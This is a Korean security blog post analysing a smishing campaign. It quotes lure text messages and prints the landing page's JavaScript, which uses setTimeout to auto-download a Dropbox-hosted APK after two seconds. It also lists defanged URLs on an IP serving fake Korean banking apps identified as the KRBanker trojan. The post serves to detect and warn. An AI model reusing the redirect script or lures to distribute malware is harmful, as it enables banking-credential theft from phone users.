스미싱(Smishing), "setTimeout() 함수"를 이용하여 시간을 지연시키는 스미싱 메시지 주의

5월 15일 탐지 된 스미싱 문자 중에서 "setTimeout() 함수"를 이용하여 다운로드 시간을 조절하는 스미싱 사이트를 확인하였다.

setTimeout()함수를 사용하는 이유는 한가지다.

스미싱 악성 어플리케이션을 자동다운로드 하는 시스템을 우회하기 위해서이다.

(점점 다운로드 시스템을 구성하는데 짜증이 좀 난다 ㅋㅋㅋㅋㅋㅋㅋ)

그럼 간단하게 이번 포스팅 내용을 살펴보자.

아래의 내용은 실제 스미싱 문자를 수신받은 문자 내용이다.

- 주말에 가족 모임 같이 놀로오세요 gil.cc/8***

- 이OO모바일 무료음악앱입니다 많은추천해주세용^ gil.cc/8***

- 노OO모바일 무료음악앱입니다 많은추천해주세용^ gil.cc/8***

- 배OO모바일 무료음악앱입니다 많은추천해주세용^ gil.cc/8***

- 김OO모바일 무료음악앱입니다 많은추천해주세용^ gil.cc/8***

※ 현재 유포서버가 살아있기 때문에 Mosaic URL 로 공개!!

단축 URL을 타고 이동하면 아래와 같은 사이트에 접근하게 된다.

그림만 봐도 알겠지만, "잠시 후 자동으로 이동한다"고 써있다.

그럼 소스코드를 한번 살펴보자.

소스코드를 보게 되면 아래와 같이 자바스크립트가 포함 된 내용을 볼 수 있다.

<BODY>

<H2>링크 이동 8gbi </H2> 104 클릭 // 104번째 접근자를 뜻한다.

<A HREF="https://www.dropbox.com/s/l9gcgj****aoov7/naver.apk?dl=1">URL 이동했습니다.</A></BR>

https://www.dropbox.com/s/l9gcgj****aoov7/naver.apk?dl=1>

</BR>

<H2>잠시후 자동으로 이동합니다.</H2>

<script type="text/javascript">

function Func1()

{

location.href = "https://www.dropbox.com/s/l9gcgj****aoov7/naver.apk?dl=1" ; // 다운로드 URL

}

function Func1Delay()

{

setTimeout("Func1()", 2000); // setTimeout 메소드는 밀리초 단위로 시간을 지정한다(1초 = 1000 밀리초)

}

Func1Delay();

</script>

</BODY>

* setTimeout() 함수

- setTimeout(code, delay);

ㄴ code : 일정시간 후 실행시킬 자바스크립트 코드를 포함한 문자열

ㄴ delay : 문자열 code 내에 있는 자바스크립트 코드가 실행되기까지 걸리는 시간 (1/1000초 단위)

* 코드 분석

setTimeout 함수에 의해 2초 후, Func1()함수를 실행시킨다.

Func1()함수는 https://www.dropbox.com/s/l9gcgj****aoov7/naver.apk?dl=1 사이트로 이동한다.

다운로드 된 "naver.apk" 파일은 특정 서버에서 국내 인터넷뱅킹 어플을 다운로드 받는 KRBanker 종류로 확인되었다.

hxxp://113.10.139.172/send/hana.apk

hxxp://113.10.139.172/send/kb.apk

hxxp://113.10.139.172/send/nh.apk

hxxp://113.10.139.172/send/woori.apk

hxxp://113.10.139.172/send/xinhan.apk

※ 현재 유포 사이트가 삭제되어 Full URL 공개

해당 악성 어플리케이션 naver.apk는 알약 안드로이드에서 Trojan.Android.KRBanker 로 탐지 된다.